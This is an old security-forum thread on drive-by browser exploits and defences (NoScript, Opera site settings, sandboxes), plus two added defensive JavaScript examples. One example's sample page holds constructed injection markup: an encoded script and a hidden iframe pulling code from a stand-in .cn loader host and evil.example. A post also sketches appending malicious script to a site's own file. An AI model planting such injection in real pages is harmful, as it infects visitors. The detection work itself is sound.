Exploits

Discussion in 'malware problems & news' started by Habakuck, Sep 12, 2009.

Thread Status:
Not open for further replies.
  1. Habakuck

    Hi all.

    I have some questions about browser exploits and techniques against them.

    Let me set up a scenario:

    A normally trusted website (e.g. disney.com) is infected by the exploit kit 'Unique Pack'.
    The compromised web page contains an injected script. This will cause the browser to visit the site encoded in the script, where an exploit kit will test various exploits against the browser and various other installed applications.

    In this scenario Flash Player and Adobe Reader are vulnerable and there is no antivirus installed.

    The PC is infected by the downloaded and executed malware.


    My questions:

    a) If I visit the infected site with Firefox 3.5 + NoScript and Flashblock, what do I see when looking in the NoScript menu for allowing scripts?

    a 1) Do I see something like this:
    a 2) Or is the script implemented in the disney.com domain in a way that NoScript has no chance to separate them?

    Because on very many websites you need to turn on the scripts, and if a 2) is the case I can't see any protection offered by NoScript.


    Question b)

    If I visit the infected site with the Iron browser and the --save-plugins switch active, will the "sandbox/dropped rights" technique protect me against the code execution?


    Question c)

    What does Opera offer against exploits? I can't see any NoScript or sandbox feature...


    Kind regards

    Habakuck
  2. Rmus (Exploit Analyst)
    This is a common scenario, where a normally trusted website is compromised by code injection which redirects the user to a site with malware code. With Opera configured properly, the PC is not infected.

    Regarding exploits against the browser

    These malware packs such as Gpack and Mpack contain exploits targeting IE6 mostly, a couple against IE7. None have any against Opera.

    Regarding exploits against Flash, Adobe, etc.

    These are triggered by scripts on the redirected site, such as:

    [screenshot: script from the redirect site]

    You will notice that the browser must have both JavaScript and plugins enabled for the exploit against Adobe Reader to work. With either one disabled, the exploit fails.

    Disabling plugins globally in Opera is easy in the Preferences. The function of the plugin is to load/run the file automatically in the browser window. Disable the plugin and the file doesn't do anything automatically.

    Also, Opera permits controlling how specific file types are downloaded. Configuring PDF, etc. to prompt for download prevents the file from loading into the browser automatically, so the exploit fails.

    Controlling scripts per site is easy in Opera. You disable scripts globally and configure per site. If I permit scripts on disney.com:

    [screenshot: disney-1.gif]

    [screenshot: disney-2.gif]

    These settings will be stored by Opera and invoked each time I visit this site. Now I will click on a link to the Disney Store, which will take me to a different site. Checking the Site Preferences, scripting is not enabled.

    [screenshot: disneystore-1.gif]

    [screenshot: disneystore-2.gif]

    This demonstrates that scripts configured on the parent site do not carry over to linked sites.

    A real-world malware example: the user is redirected to a site with a fake scan to trick them into installing a rogue AV product. The code on the redirected site loads several JavaScript files which set up the images for the fake scan:

    Code:
    <script src='fileslist.js'></script>
    <script src='progressbar2.js?v=1.1'></script>
    <script src='common.js'></script>
    With scripting disabled, I see a blank page upon redirection:

    [screenshot: blank page after redirection]

    If I enable scripting and reload the page, the fake scan image appears:

    [screenshot: fake scan page]

    Proper configuration of the browser nullifies most of the web-embedded exploits.

    I am not familiar with configuring the other browsers you mention.

    ----
    rich
  3. Habakuck

    Habakuck Registered Member

    Joined:
    May 24, 2009
    Posts:
    544
    Thank you very much Rich! That was a top-notch answer! :)

    One thing that I didn't get yet:

    If I enable the scripts for disney.com and there is an injected malicious script, this will cause the malicious script to work as well as the legitimate scripts on that site. Am I right?

    After that the script will redirect me to another site where the exploit kit is waiting.
    So I will see a random URL* in the address bar and can think about enabling scripts on that site too. *Is that URL always so obviously malicious?
    But if I would do so, the exploit can do its dirty job.

    Disabling plugins seems to be very good at preventing exploits, but things like Foxit Reader or Flash are necessary for me. Otherwise I couldn't see any videos or have a quick view of PDF files.
    I moved to Foxit Reader because of recurring exploits for Adobe, but I could not find a way around the damn Macromedia Flash Player.
    And I think there were some exploits against Foxit Reader too.. :(

    Therefore I am very interested in either using Opera, FF+NoScript or Iron with its sandbox. But I don't know how good the sandbox is. In some hacker competitions the Iron browser was the only one which was not hacked. It was exploited, but the sandbox prevented further code execution... But what a shame: I didn't find any competition in which Opera took part. :doubt:
  4. Rmus (Exploit Analyst)
    You are welcome.

    Yes, any script will execute if scripting is enabled.

    Seeing a URL - that depends. If it is a script exploit, it may start running before you see a URL. Otherwise, I suppose a site advisor might flag a malicious URL, or an antivirus product might flag something in the code. Yes, the exploit would do its dirty job if permitted to execute.

    I understand that loading in the browser allows you to start reading before the complete document downloads. If this is important, then you have two other protections from the drive-by download: a firewall that monitors outbound connections, and a security product with execution protection. See a description here:

    http://www.urs2.net/rsj/computing/tests/pdf/

    Yes, many. Foxit tended to patch more quickly than Adobe; however, I noticed a number of victims who were using an unpatched version.

    [screenshot]

    ----
    rich
  5. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    Always good info and screenshots from Rmus. As Rmus uses Opera, I'd like to add here's what happens when I try to view a PDF with Foxit online with FF:

    [screenshot: n1.jpg]

    I always get prompted.

    Plus you can block referrers if you configure FF by typing in about:config, then typing in referrer and then double-clicking to toggle it to False.

    [screenshot: ffr.jpg]

    A better way though, which will enable you to allow/deny referrers in real time on the fly, is to install the RequestPolicy extension in FF.

    [screenshot: Request Policy.jpg]

    You will also see some other extensions I've installed which I highly recommend too.
  6. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    Hi, I will just suggest to sandbox your browser. It's simple, no hassle, and rock solid. Also you don't need to sacrifice any functionality, no pop-ups, no need to make a lot of settings either.
    GeSWall, DefenseWall or Sandboxie, any one will do the job.
  7. Rmus (Exploit Analyst)
    Hi aigle,

    Are you advising people not to bother with browser settings -- just let drive-by attacks, such as PDF, run and then empty the sandbox afterwards?

    ----
    rich
  8. Habakuck

    Habakuck Registered Member

    Joined:
    May 24, 2009
    Posts:
    544
    I run my FF sandboxed here. No problem. But I will switch to Win7 64-bit and there is no sandbox program at all.
    So I came to Iron, which uses a tiny sandbox.

    Thank you StevieO! That is exactly what I see here.
    But I see one problem: if I want to see this PDF because I think it is trustworthy, I will allow NoScript to open that file. If the PDF file is compromised, I am in trouble.

    In conclusion I cannot see any protection offered by NoScript. If I visit disney.com and want to see what the site is about, I have to allow the scripts, exposing me to exploits.
  9. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    IMO a sandbox is easier to manage, safer and gives at least the same level of security. Also there is no loss of usability/functionality.

    The choice is yours. Do you want to click and click to make preferences on a per-site basis, or just install a sandbox, configure it and forget?

    BTW, I did so for a long time (tweaking preferences on a per-site basis) until I got fed up, and now my Opera runs with every default option enabled (except some cookie settings), within GeSWall. I don't get any problems and don't need to bother with a lot of settings. I love security that is install and forget.

    If someone doesn't want/like sandboxing for any reason, then he/she always has the option to play with browser settings, whether it is Opera, IE, or FF etc.
  10. Habakuck

    Habakuck Registered Member

    Joined:
    May 24, 2009
    Posts:
    544
    Do you know any sandbox for 64-bit?
  11. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    Not ATM.

    You reminded me of Haute Secure. I miss that software.
  12. Rmus (Exploit Analyst)
    Thanks for your explanations!

    ----
    rich
     
  13. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    As you wrote, Iron is one choice, but its sandbox doesn't work for the plugins.
  14. Habakuck

    Habakuck Registered Member

    Joined:
    May 24, 2009
    Posts:
    544
    It does with the --save-plugins switch! :ninja: And that is really cool! :thumb:
  15. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    Hmmm. I never knew that. Can you explain this please?
  16. 1boss1

    1boss1 Registered Member

    Joined:
    Jun 26, 2009
    Posts:
    401
    Location:
    Australia
    One add-on I find handy is JSView. It's not meant to be a security tool in any way; it's a programming/development tool.

    But in the context menu you can view all the JavaScript on the page:

    [screenshot: js-view.png]

    Then if you click on any of the JavaScript or CSS entries, it opens it up in a View Source so you can see the scripting. It does help if you understand JavaScript, so you can see what it's doing before enabling it, but the average person can normally tell by skimming over it if it's calling script from some .cn domain, if the code is obfuscated/packed, or if it's calling things like Flash or PDF.

    Anyhow, it may be helpful to someone.
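    The skim described in the post above, done in code, as an added example that is not part of the original thread and not JSView's own code: it walks the script, frame and plugin elements of a page and tags the things a reviewer would look for (third-party or .cn hosts, eval/unescape/packed strings, zero-size frames, embedded PDF or Flash). The page host, the watch list of TLDs, the heuristics and the sample HTML below are all constructed for illustration; the %xx string is only an encoded document.write() call, not exploit code.

```javascript
// Added example: static triage of the scripts and plugin content in a page.
// Not JSView's code; names, heuristics and sample HTML are constructed.

const PAGE_HOST = 'www.example-site.test';    // assumed host of the page under review
const SUSPECT_TLDS = ['.cn', '.ru'];           // constructed watch list (the post mentions .cn)
const RISKY_TAGS = ['hidden', 'suspect TLD', 'eval', 'unescape', 'fromCharCode'];

// Constructed sample page: a first-party script, a third-party analytics
// script, an injected inline script hidden behind unescape(), a zero-size
// iframe and an embedded PDF.
const SAMPLE_HTML = `
<html><head>
<script src="/js/menu.js"></script>
<script src="https://cdn.partner.test/analytics.js"></script>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%6c%6f%61%64%65%72%2e%65%78%61%6d%70%6c%65%2e%63%6e%2f%69%6e%2e%70%68%70%22%3e%27%29'));</script>
</head><body>
<iframe src="http://loader.example.cn/in.php" width="0" height="0" style="display:none"></iframe>
<object data="/files/brochure.pdf" type="application/pdf"></object>
</body></html>`;

// Hostname of a script/frame reference; relative paths resolve to the page host.
function hostOf(ref) {
  try { return new URL(ref, `http://${PAGE_HOST}/`).hostname; } catch (e) { return null; }
}

// Tags that depend only on where the content is loaded from.
function originTags(host) {
  const tags = [];
  if (host && host !== PAGE_HOST) tags.push('third-party');
  if (host && SUSPECT_TLDS.some(t => host.endsWith(t))) tags.push('suspect TLD');
  return tags;
}

// Crude packer/obfuscation indicators in script text.
function obfuscationSigns(code) {
  const checks = [
    ['eval', /\beval\s*\(/], ['unescape', /\bunescape\s*\(/],
    ['fromCharCode', /String\.fromCharCode/], ['document.write', /document\.write\s*\(/],
    ['long %xx run', /(%[0-9a-fA-F]{2}){16,}/], ['long \\x run', /(\\x[0-9a-fA-F]{2}){16,}/],
  ];
  return checks.filter(([, re]) => re.test(code)).map(([name]) => name);
}

// Peel one unescape('...') layer so the reviewer can see what it really does.
function peelUnescape(code) {
  const m = code.match(/unescape\(\s*'([^']+)'\s*\)/);
  if (!m) return null;
  try { return decodeURIComponent(m[1]); } catch (e) { return null; }
}

// Value of a quoted attribute, or '' if absent.
function attr(attrs, name) {
  const m = attrs.match(new RegExp(`\\b${name}\\s*=\\s*["']([^"']*)["']`, 'i'));
  return m ? m[1] : '';
}

// Walk <script>, <iframe>, <object> and <embed> elements and tag each one.
function triageHtml(html) {
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const src = attr(m[1], 'src');
    if (src) {
      findings.push({ kind: 'script', where: src, tags: originTags(hostOf(src)) });
    } else {
      const tags = obfuscationSigns(m[2]);
      const decoded = peelUnescape(m[2]);
      if (decoded) tags.push(...obfuscationSigns(decoded).map(t => 'decoded:' + t));
      findings.push({ kind: 'inline-script', where: '(inline)', tags, decoded });
    }
  }
  const elemRe = /<(iframe|object|embed)\b([^>]*)>/gi;
  while ((m = elemRe.exec(html)) !== null) {
    const attrs = m[2];
    const ref = attr(attrs, 'src') || attr(attrs, 'data');
    const tags = originTags(hostOf(ref));
    if (/\b(width|height)\s*=\s*["']?0(?!\d)|display\s*:\s*none/i.test(attrs)) tags.push('hidden');
    if (/\.(swf|pdf)(\?|$)/i.test(ref) || /application\/(pdf|x-shockwave-flash)/i.test(attrs)) tags.push('plugin content');
    findings.push({ kind: m[1].toLowerCase(), where: ref, tags });
  }
  return findings;
}

// The findings a reviewer should read before clicking "Allow".
function suspicious(findings) {
  return findings.filter(f => f.tags.some(t => RISKY_TAGS.includes(t)));
}

for (const f of triageHtml(SAMPLE_HTML)) console.log(f.kind, f.where, f.tags.join(', '));
```

    On the sample the two things that matter surface immediately: the inline script is tagged eval/unescape with a long %xx run, and peeling that layer shows it writes an iframe to a .cn host; the zero-size iframe to the same host is tagged hidden and third-party. The first-party menu.js carries no tag at all, which is the limitation the thread keeps coming back to: a script appended to an existing first-party file looks clean from the outside, and only reading its content would tell.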
     
  19. developers

    developers Registered Member

    Joined:
    Apr 1, 2009
    Posts:
    62
    You can switch to the Full domains view and allow only the top-level script (i.e. the disney.com script), so third-party scripts (i.e. malicious scripts) are blocked.

    http://noscript.net/features

     
  20. Habakuck

    Habakuck Registered Member

    Joined:
    May 24, 2009
    Posts:
    544
    It will drop the rights for any plugin, so the plugins are integrated in the sandbox.
    And of course it is --safe-plugins. ;) Was a bit late yesterday...
  21. Habakuck

    Habakuck Registered Member

    Joined:
    May 24, 2009
    Posts:
    544
    I think that is the default setting. But my question was: are the malicious scripts implemented in the top-level document in a way which NoScript cannot "see"?
  22. 1boss1

    1boss1 Registered Member

    Joined:
    Jun 26, 2009
    Posts:
    401
    Location:
    Australia
    Typically the JavaScript is inserted in the top-level document and it pulls the exploit from a third-party domain, which NoScript can see/block.

    However.. take Wilders for example: there's nothing stopping me from appending the malicious JavaScript to a pre-existing .js file, for instance:

    Code:
    wilderssecurity.com/clientscript/vbulletin_menu.js
    Then uploading the actual exploit to the attachment or avatar directory so it's fully contained on this domain. If you have JS allowed for this domain you will get hit.

    If a site is compromised anything can happen; if your favorite software vendor's site/server was compromised, their .exe could be tampered with and you'd download it thinking it's a trusted file.

    NoScript alone isn't foolproof; it's about risk reduction and an additional layer that could very well save your backside.
  23. developers

    developers Registered Member

    Joined:
    Apr 1, 2009
    Posts:
    62
    The default setting in the menu is "base 2nd level domains", because it is simpler for the average user.
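    The point made across the last few posts (developers' "full domains" vs "base 2nd level domains" modes, and 1boss1's case of malicious code appended to a first-party file), as an added example that is not part of the original thread and not NoScript's code: a per-site script allow-list decides by where a script is loaded from, never by what it contains. The sample page, its script URLs and the function names are constructed, and "base 2nd level domain" is simplified here to the last two labels of the hostname, which is an assumption (NoScript works from a public-suffix list).

```javascript
// Added example: how a per-site script allow-list treats script sources under
// NoScript's two menu modes. Not NoScript's code; names and data are constructed.

// Constructed sample page: top-level document on www.disney.com loading four
// scripts. The last one stands in for an injected exploit-kit loader.
const SAMPLE_PAGE = {
  url: 'https://www.disney.com/',
  inlineScript: true,                              // the page also has inline <script> blocks
  scripts: [
    'https://www.disney.com/js/site.js',           // first-party, same host
    'https://static.disney.com/js/menu.js',        // first-party, different subdomain
    'https://cdn.example-ads.net/tag.js',          // third-party
    'https://evil.example/kit/loader.js',          // injected third-party loader (constructed)
  ],
};

// Simplified "base 2nd level domain": last two labels of the host. Assumption
// for this example; NoScript uses a public-suffix list instead.
function baseDomain(host) {
  return host.split('.').slice(-2).join('.');
}

// Key under which a host is compared against the allow-list in a given mode.
function siteKey(host, mode) {
  return mode === 'full' ? host : baseDomain(host);
}

// For each external script on the page, decide whether the allow-list lets it
// run. allowList holds the hosts or base domains the user clicked "Allow" on.
function classifyScripts(page, allowList, mode) {
  const allowed = new Set(allowList.map(h => siteKey(h, mode)));
  return page.scripts.map(src => {
    const host = new URL(src).hostname;
    const key = siteKey(host, mode);
    return { src, key, allowed: allowed.has(key) };
  });
}

// Inline scripts have no src: they run iff the page's own origin is allowed.
// This is 1boss1's case (code injected into the top-level document or appended
// to an existing first-party .js): the list sees the origin, never the content.
function inlineScriptsRun(page, allowList, mode) {
  const pageHost = new URL(page.url).hostname;
  return page.inlineScript && allowList.some(h => siteKey(h, mode) === siteKey(pageHost, mode));
}

// Scripts that would actually execute, for a quick look.
function runningScripts(page, allowList, mode) {
  return classifyScripts(page, allowList, mode).filter(s => s.allowed).map(s => s.src);
}

for (const [list, mode] of [[['disney.com'], 'base'], [['www.disney.com'], 'full']]) {
  console.log(`mode=${mode} allow=${list.join(',')}`);
  console.log('  runs:', runningScripts(SAMPLE_PAGE, list, mode));
  console.log('  inline scripts run:', inlineScriptsRun(SAMPLE_PAGE, list, mode));
}
```

    Allowing disney.com in the default mode lets every *.disney.com script run; switching to full domains and allowing only www.disney.com blocks static.disney.com as well. The injected loader on evil.example is blocked in both modes, which is the protection NoScript does give. What neither mode can do is stop an inline script or a tampered first-party file once the page's own domain is allowed, which is exactly the gap Habakuck is asking about.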
     
  24. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    Thanks, all of you. :)

    But it's a bit over my head. Do I have to make a custom shortcut for Iron?
  25. 1boss1

    1boss1 Registered Member

    Joined:
    Jun 26, 2009
    Posts:
    401
    Location:
    Australia
    That's a cool site; whoever built that must be very talented. :argh:

    Yes, create a regular shortcut. Then right-click > Properties and you will see the path to Iron in quotes. After the last quote, add a space then --switch

    Replace switch with whichever command you want to enable/disable. You can add multiple switches with a space:

    chrome.exe --enable-user-scripts --enable-sync --bookmark-menu